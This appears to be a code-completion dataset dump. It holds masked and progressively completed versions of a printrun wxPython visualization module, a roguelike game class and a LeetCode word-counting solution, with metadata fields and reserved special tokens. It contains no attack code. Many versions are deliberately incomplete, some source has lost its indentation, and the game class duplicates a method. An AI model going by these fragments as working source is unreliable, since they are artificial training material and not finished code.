bgcolor=root.bgcolor)
root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())
if not isinstance(root.gviz, NoViz):
self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.
ALIGN_CENTER_HORIZONTAL)
<|reserved_special_token_1|>
# This file is part of the printrun suite.
#
# printrun is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# printrun is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with printrun. If not, see <http://www.gnu.org/licenses/>.
import traceback
import logging
import wx
class NoViz:
showall = False
def clear(self, *a):
pass
def addfile_perlayer(self, gcode, showall = False):
layer_idx = 0
while layer_idx < len(gcode.all_layers):
yield layer_idx
layer_idx += 1
yield None
def addfile(self, *a, **kw):
pass
def addgcode(self, *a, **kw):
pass
def addgcodehighlight(self, *a, **kw):
pass
def Refresh(self, *a):
pass
def setlayer(self, *a):
pass
class NoVizWindow:
def __init__(self):
self.p = NoViz()
def Destroy(self):
pass
class VizPane(wx.BoxSizer):
def __init__(self, root, parentpanel = None):
super(VizPane, self).__init__(wx.VERTICAL)
if not parentpanel: parentpanel = root.panel
if root.settings.mainviz == "None":
root.gviz = NoViz()
root.gwindow = NoVizWindow()
return
use2dview = root.settings.mainviz == "2D"
if root.settings.mainviz == "3D":
try:
import printrun.gcview
root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel, root.build_dimensions_list, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))
root.gviz.clickcb = root.show_viz_window
except:
use2dview = True
logging.error("3D view mode requested, but we failed to initialize it.\n"
+ "Falling back to 2D view, and here is the backtrace:\n"
+ traceback.format_exc())
if use2dview:
from printrun import gviz
root.gviz = gviz.Gviz(parentpanel, (300, 300),
build_dimensions = root.build_dimensions_list,
grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width = root.settings.preview_extrusion_width,
bgcolor = root.bgcolor)
root.gviz.SetToolTip(wx.ToolTip(_("Click to examine / edit\n layers of loaded file")))
root.gviz.showall = 1
root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)
use3dview = root.settings.viz3d
if use3dview:
try:
import printrun.gcview
objects = None
if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):
objects = root.gviz.objects
root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.ID_ANY, 'Gcode view, shift to move view, mousewheel to set layer', size = (600, 600), build_dimensions = root.build_dimensions_list, objects = objects, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))
except:
use3dview = False
logging.error("3D view mode requested, but we failed to initialize it.\n"
+ "Falling back to 2D view, and here is the backtrace:\n"
+ traceback.format_exc())
if not use3dview:
from printrun import gviz
root.gwindow = gviz.GvizWindow(build_dimensions = root.build_dimensions_list,
grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),
extrusion_width = root.settings.preview_extrusion_width,
bgcolor = root.bgcolor)
root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())
if not isinstance(root.gviz, NoViz):
self.Add(root.gviz.widget, 1, flag = wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL)
|
flexible
|
{
"blob_id": "3cc473f6bb4b2e1dd806edb8b096a6118fe7056a",
"index": 7202,
"step-1": "<mask token>\n\n\nclass NoViz:\n <mask token>\n <mask token>\n <mask token>\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n <mask token>\n <mask token>\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n ID_ANY,\n 'Gcode view, shift to move view, mousewheel to set layer',\n size=(600, 600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-2": "<mask token>\n\n\nclass NoViz:\n <mask token>\n <mask token>\n <mask token>\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n <mask token>\n\n def setlayer(self, *a):\n pass\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n ID_ANY,\n 'Gcode view, shift to move view, mousewheel to set layer',\n size=(600, 600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-3": "<mask token>\n\n\nclass NoViz:\n <mask token>\n\n def clear(self, *a):\n pass\n <mask token>\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n <mask token>\n\n def setlayer(self, *a):\n pass\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n ID_ANY,\n 'Gcode view, shift to move view, mousewheel to set layer',\n size=(600, 600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-4": "import traceback\nimport logging\nimport wx\n\n\nclass NoViz:\n showall = False\n\n def clear(self, *a):\n pass\n\n def addfile_perlayer(self, gcode, showall=False):\n layer_idx = 0\n while layer_idx < len(gcode.all_layers):\n yield layer_idx\n layer_idx += 1\n yield None\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n\n def Refresh(self, *a):\n pass\n\n def setlayer(self, *a):\n pass\n\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel=None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel:\n parentpanel = root.panel\n if root.settings.mainviz == 'None':\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == '2D'\n if root.settings.mainviz == '3D':\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel,\n root.build_dimensions_list, root=root, circular=root.\n settings.circular_bed, antialias_samples=int(root.\n settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300), build_dimensions\n =root.build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\n 'Click to examine / edit\\n layers of loaded file')))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.\n ID_ANY,\n 'Gcode view, shift to move view, mousewheel to set layer',\n size=(600, 600), build_dimensions=root.\n build_dimensions_list, objects=objects, root=root,\n circular=root.settings.circular_bed, antialias_samples=\n int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\n '3D view mode requested, but we failed to initialize it.\\n'\n +\n \"\"\"Falling back to 2D view, and here is the backtrace:\n\"\"\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions=root.\n build_dimensions_list, grid=(root.settings.\n preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width=root.settings.preview_extrusion_width,\n bgcolor=root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag=wx.EXPAND | wx.\n ALIGN_CENTER_HORIZONTAL)\n",
"step-5": "# This file is part of the printrun suite.\n#\n# printrun is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# printrun is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with printrun. If not, see <http://www.gnu.org/licenses/>.\n\nimport traceback\nimport logging\n\nimport wx\n\nclass NoViz:\n\n showall = False\n\n def clear(self, *a):\n pass\n\n def addfile_perlayer(self, gcode, showall = False):\n layer_idx = 0\n while layer_idx < len(gcode.all_layers):\n yield layer_idx\n layer_idx += 1\n yield None\n\n def addfile(self, *a, **kw):\n pass\n\n def addgcode(self, *a, **kw):\n pass\n\n def addgcodehighlight(self, *a, **kw):\n pass\n\n def Refresh(self, *a):\n pass\n\n def setlayer(self, *a):\n pass\n\nclass NoVizWindow:\n\n def __init__(self):\n self.p = NoViz()\n\n def Destroy(self):\n pass\n\nclass VizPane(wx.BoxSizer):\n\n def __init__(self, root, parentpanel = None):\n super(VizPane, self).__init__(wx.VERTICAL)\n if not parentpanel: parentpanel = root.panel\n if root.settings.mainviz == \"None\":\n root.gviz = NoViz()\n root.gwindow = NoVizWindow()\n return\n use2dview = root.settings.mainviz == \"2D\"\n if root.settings.mainviz == \"3D\":\n try:\n import printrun.gcview\n root.gviz = printrun.gcview.GcodeViewMainWrapper(parentpanel, root.build_dimensions_list, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))\n root.gviz.clickcb = root.show_viz_window\n except:\n use2dview = True\n logging.error(\"3D view mode requested, but we failed to initialize it.\\n\"\n + \"Falling back to 2D view, and here is the backtrace:\\n\"\n + traceback.format_exc())\n if use2dview:\n from printrun import gviz\n root.gviz = gviz.Gviz(parentpanel, (300, 300),\n build_dimensions = root.build_dimensions_list,\n grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width = root.settings.preview_extrusion_width,\n bgcolor = root.bgcolor)\n root.gviz.SetToolTip(wx.ToolTip(_(\"Click to examine / edit\\n layers of loaded file\")))\n root.gviz.showall = 1\n root.gviz.Bind(wx.EVT_LEFT_DOWN, root.show_viz_window)\n use3dview = root.settings.viz3d\n if use3dview:\n try:\n import printrun.gcview\n objects = None\n if isinstance(root.gviz, printrun.gcview.GcodeViewMainWrapper):\n objects = root.gviz.objects\n root.gwindow = printrun.gcview.GcodeViewFrame(None, wx.ID_ANY, 'Gcode view, shift to move view, mousewheel to set layer', size = (600, 600), build_dimensions = root.build_dimensions_list, objects = objects, root = root, circular = root.settings.circular_bed, antialias_samples = int(root.settings.antialias3dsamples))\n except:\n use3dview = False\n logging.error(\"3D view mode requested, but we failed to initialize it.\\n\"\n + \"Falling back to 2D view, and here is the backtrace:\\n\"\n + traceback.format_exc())\n if not use3dview:\n from printrun import gviz\n root.gwindow = gviz.GvizWindow(build_dimensions = root.build_dimensions_list,\n grid = (root.settings.preview_grid_step1, root.settings.preview_grid_step2),\n extrusion_width = root.settings.preview_extrusion_width,\n bgcolor = root.bgcolor)\n root.gwindow.Bind(wx.EVT_CLOSE, lambda x: root.gwindow.Hide())\n if not isinstance(root.gviz, NoViz):\n self.Add(root.gviz.widget, 1, flag = wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL)\n",
"step-ids": [
9,
10,
11,
15,
16
]
}
|
[
9,
10,
11,
15,
16
] |
from . import utils
from . import objects
START = (0, 0)
STARTING_LIFE = 10
WHITE = (255, 255, 255)
class RoughLightGame:
def __init__(self, game_map, width, height, **kwargs):
self.map = game_map
self.width = width
self.height = height
self.objects = kwargs.get('objects', list())
self.start = kwargs.get('start', utils.Vector(0, 0))
# player initialization
self.player = kwargs.get('player', None)
if not self.player:
self.player = objects.Player(self.start, b'@', WHITE,
self.map, STARTING_LIFE, fov=20)
self.objects.append(self.player)
# Add room lables to map
count = 0
for room in self.map.rooms:
label = objects.Object(room.get_center(), chr(ord('a')+count), WHITE, True, False)
self.objects.append(label)
count += 1
def is_blocked(self, location):
if self.map[location].blocks:
return True
return any(object.location == location and object.blocks for object in self.objects)
def visible_objects(self):
res = []
for object in self.objects:
if object.visible and object.location in self.player.seen:
if self.map.in_area(self.width, self.height, object.location, self.player.location):
res.append(object)
return reversed(res)
def move_player(self, direction):
if not self.is_blocked(self.player.location + direction):
self.player.move(direction)
def is_blocked(self, location):
if self.map[location].blocks:
return True
return any(object.blocks and object.location == location for object in self.objects)
def get_area(self, width, height):
# Get the current area the player is in based on desired size and players location
return self.map.get_area(width, height, self.player.location)
|
normal
|
{
"blob_id": "5f089c3e67452fe6d14f96a70d792bc0d056b375",
"index": 9227,
"step-1": "<mask token>\n\n\nclass RoughLightGame:\n\n def __init__(self, game_map, width, height, **kwargs):\n self.map = game_map\n self.width = width\n self.height = height\n self.objects = kwargs.get('objects', list())\n self.start = kwargs.get('start', utils.Vector(0, 0))\n self.player = kwargs.get('player', None)\n if not self.player:\n self.player = objects.Player(self.start, b'@', WHITE, self.map,\n STARTING_LIFE, fov=20)\n self.objects.append(self.player)\n count = 0\n for room in self.map.rooms:\n label = objects.Object(room.get_center(), chr(ord('a') + count),\n WHITE, True, False)\n self.objects.append(label)\n count += 1\n <mask token>\n <mask token>\n\n def move_player(self, direction):\n if not self.is_blocked(self.player.location + direction):\n self.player.move(direction)\n <mask token>\n\n def get_area(self, width, height):\n return self.map.get_area(width, height, self.player.location)\n",
"step-2": "<mask token>\n\n\nclass RoughLightGame:\n\n def __init__(self, game_map, width, height, **kwargs):\n self.map = game_map\n self.width = width\n self.height = height\n self.objects = kwargs.get('objects', list())\n self.start = kwargs.get('start', utils.Vector(0, 0))\n self.player = kwargs.get('player', None)\n if not self.player:\n self.player = objects.Player(self.start, b'@', WHITE, self.map,\n STARTING_LIFE, fov=20)\n self.objects.append(self.player)\n count = 0\n for room in self.map.rooms:\n label = objects.Object(room.get_center(), chr(ord('a') + count),\n WHITE, True, False)\n self.objects.append(label)\n count += 1\n <mask token>\n <mask token>\n\n def move_player(self, direction):\n if not self.is_blocked(self.player.location + direction):\n self.player.move(direction)\n\n def is_blocked(self, location):\n if self.map[location].blocks:\n return True\n return any(object.blocks and object.location == location for object in\n self.objects)\n\n def get_area(self, width, height):\n return self.map.get_area(width, height, self.player.location)\n",
"step-3": "<mask token>\n\n\nclass RoughLightGame:\n\n def __init__(self, game_map, width, height, **kwargs):\n self.map = game_map\n self.width = width\n self.height = height\n self.objects = kwargs.get('objects', list())\n self.start = kwargs.get('start', utils.Vector(0, 0))\n self.player = kwargs.get('player', None)\n if not self.player:\n self.player = objects.Player(self.start, b'@', WHITE, self.map,\n STARTING_LIFE, fov=20)\n self.objects.append(self.player)\n count = 0\n for room in self.map.rooms:\n label = objects.Object(room.get_center(), chr(ord('a') + count),\n WHITE, True, False)\n self.objects.append(label)\n count += 1\n\n def is_blocked(self, location):\n if self.map[location].blocks:\n return True\n return any(object.location == location and object.blocks for object in\n self.objects)\n <mask token>\n\n def move_player(self, direction):\n if not self.is_blocked(self.player.location + direction):\n self.player.move(direction)\n\n def is_blocked(self, location):\n if self.map[location].blocks:\n return True\n return any(object.blocks and object.location == location for object in\n self.objects)\n\n def get_area(self, width, height):\n return self.map.get_area(width, height, self.player.location)\n",
"step-4": "<mask token>\nSTART = 0, 0\nSTARTING_LIFE = 10\nWHITE = 255, 255, 255\n\n\nclass RoughLightGame:\n\n def __init__(self, game_map, width, height, **kwargs):\n self.map = game_map\n self.width = width\n self.height = height\n self.objects = kwargs.get('objects', list())\n self.start = kwargs.get('start', utils.Vector(0, 0))\n self.player = kwargs.get('player', None)\n if not self.player:\n self.player = objects.Player(self.start, b'@', WHITE, self.map,\n STARTING_LIFE, fov=20)\n self.objects.append(self.player)\n count = 0\n for room in self.map.rooms:\n label = objects.Object(room.get_center(), chr(ord('a') + count),\n WHITE, True, False)\n self.objects.append(label)\n count += 1\n\n def is_blocked(self, location):\n if self.map[location].blocks:\n return True\n return any(object.location == location and object.blocks for object in\n self.objects)\n\n def visible_objects(self):\n res = []\n for object in self.objects:\n if object.visible and object.location in self.player.seen:\n if self.map.in_area(self.width, self.height, object.\n location, self.player.location):\n res.append(object)\n return reversed(res)\n\n def move_player(self, direction):\n if not self.is_blocked(self.player.location + direction):\n self.player.move(direction)\n\n def is_blocked(self, location):\n if self.map[location].blocks:\n return True\n return any(object.blocks and object.location == location for object in\n self.objects)\n\n def get_area(self, width, height):\n return self.map.get_area(width, height, self.player.location)\n",
"step-5": "from . import utils\nfrom . import objects\n\nSTART = (0, 0)\nSTARTING_LIFE = 10\n\nWHITE = (255, 255, 255)\n\nclass RoughLightGame:\n\n def __init__(self, game_map, width, height, **kwargs):\n\n self.map = game_map\n self.width = width\n self.height = height\n\n self.objects = kwargs.get('objects', list())\n self.start = kwargs.get('start', utils.Vector(0, 0))\n\n # player initialization\n self.player = kwargs.get('player', None)\n if not self.player:\n self.player = objects.Player(self.start, b'@', WHITE,\n self.map, STARTING_LIFE, fov=20)\n\n self.objects.append(self.player)\n\n # Add room lables to map\n count = 0\n for room in self.map.rooms:\n label = objects.Object(room.get_center(), chr(ord('a')+count), WHITE, True, False)\n self.objects.append(label)\n count += 1\n\n def is_blocked(self, location):\n if self.map[location].blocks:\n return True\n\n return any(object.location == location and object.blocks for object in self.objects)\n\n\n def visible_objects(self):\n res = []\n for object in self.objects:\n if object.visible and object.location in self.player.seen:\n if self.map.in_area(self.width, self.height, object.location, self.player.location):\n res.append(object)\n return reversed(res)\n \n\n def move_player(self, direction):\n if not self.is_blocked(self.player.location + direction):\n self.player.move(direction)\n\n def is_blocked(self, location):\n if self.map[location].blocks:\n return True\n\n return any(object.blocks and object.location == location for object in self.objects)\n\n def get_area(self, width, height):\n # Get the current area the player is in based on desired size and players location\n return self.map.get_area(width, height, self.player.location)\n\n\n",
"step-ids": [
4,
5,
6,
8,
10
]
}
|
[
4,
5,
6,
8,
10
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def mostCommonWord(self, paragraph, banned):
"""
:type paragraph: str
:type banned: List[str]
:rtype: str
"""
import re
from collections import Counter
paragraph = re.sub('[\\W]', ' ', paragraph)
words = paragraph.strip().split()
words = map(str.lower, words)
cnt = Counter(words)
for word, _ in cnt.most_common():
if word not in banned:
return word
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
def mostCommonWord(self, paragraph, banned):
"""
:type paragraph: str
:type banned: List[str]
:rtype: str
"""
import re
from collections import Counter
paragraph = re.sub('[\\W]', ' ', paragraph)
words = paragraph.strip().split()
words = map(str.lower, words)
cnt = Counter(words)
for word, _ in cnt.most_common():
if word not in banned:
return word
if __name__ == '__main__':
paragraph = 'a, a, a, a, b,b,b,c, c'
banned = ['a']
sol = Solution()
print(sol.mostCommonWord(paragraph, banned))
<|reserved_special_token_1|>
"""
corner cases like:
word[!?',;.]
word[!?',;.]word[!?',;.]word
so don't consider the punctuation will only exist after one word, and followed by a whitespace
use re for regular expression match,
replace or punctuations, and split words
"""
class Solution:
def mostCommonWord(self, paragraph, banned):
"""
:type paragraph: str
:type banned: List[str]
:rtype: str
"""
# def filterpunc(word):
# word = word.lower()
# for p in "!?',;.":
# word = word.strip(p)
# if word in banned:
# return ''
# return word
# from collections import Counter
# banned = set(banned)
# words = paragraph.strip().split()
# # words = list(filter(lambda x: not any(map(lambda y: y in x, list("!?',;."))), words))
# words = list(filter(lambda x: x not in "!?',;.", words))
# words = map(filterpunc, words)
# words = filter(None, words)
# return Counter(words).most_common(1)[0][0]
import re
from collections import Counter
paragraph = re.sub('[\W]', ' ', paragraph)
words = paragraph.strip().split()
words = map(str.lower, words)
cnt = Counter(words)
for word,_ in cnt.most_common():
if word not in banned:
return word
if __name__ == "__main__":
# paragraph = "Bob hit a ball, the hit BALL flew far after it was hit."
# banned = ["hit"]
# paragraph = "Bob. hIt, baLl"
# banned = ["bob", "hit"]
paragraph = "a, a, a, a, b,b,b,c, c"
banned = ['a']
sol = Solution()
print(sol.mostCommonWord(paragraph, banned))
|
flexible
|
{
"blob_id": "3bb50b61c7a3e98ede0a31e574f39b4ea7f22de5",
"index": 9197,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def mostCommonWord(self, paragraph, banned):\n \"\"\"\n :type paragraph: str\n :type banned: List[str]\n :rtype: str\n \"\"\"\n import re\n from collections import Counter\n paragraph = re.sub('[\\\\W]', ' ', paragraph)\n words = paragraph.strip().split()\n words = map(str.lower, words)\n cnt = Counter(words)\n for word, _ in cnt.most_common():\n if word not in banned:\n return word\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Solution:\n\n def mostCommonWord(self, paragraph, banned):\n \"\"\"\n :type paragraph: str\n :type banned: List[str]\n :rtype: str\n \"\"\"\n import re\n from collections import Counter\n paragraph = re.sub('[\\\\W]', ' ', paragraph)\n words = paragraph.strip().split()\n words = map(str.lower, words)\n cnt = Counter(words)\n for word, _ in cnt.most_common():\n if word not in banned:\n return word\n\n\nif __name__ == '__main__':\n paragraph = 'a, a, a, a, b,b,b,c, c'\n banned = ['a']\n sol = Solution()\n print(sol.mostCommonWord(paragraph, banned))\n",
"step-5": "\"\"\"\ncorner cases like:\n\nword[!?',;.]\nword[!?',;.]word[!?',;.]word\n\n\nso don't consider the punctuation will only exist after one word, and followed by a whitespace\n\nuse re for regular expression match,\nreplace or punctuations, and split words\n\n\"\"\"\n\n\nclass Solution:\n def mostCommonWord(self, paragraph, banned):\n \"\"\"\n :type paragraph: str\n :type banned: List[str]\n :rtype: str\n \"\"\"\n # def filterpunc(word):\n # word = word.lower()\n # for p in \"!?',;.\":\n # word = word.strip(p)\n # if word in banned:\n # return ''\n # return word\n # from collections import Counter\n # banned = set(banned)\n # words = paragraph.strip().split()\n # # words = list(filter(lambda x: not any(map(lambda y: y in x, list(\"!?',;.\"))), words))\n # words = list(filter(lambda x: x not in \"!?',;.\", words))\n # words = map(filterpunc, words)\n # words = filter(None, words)\n # return Counter(words).most_common(1)[0][0]\n \n import re\n from collections import Counter\n paragraph = re.sub('[\\W]', ' ', paragraph)\n words = paragraph.strip().split()\n words = map(str.lower, words)\n cnt = Counter(words)\n for word,_ in 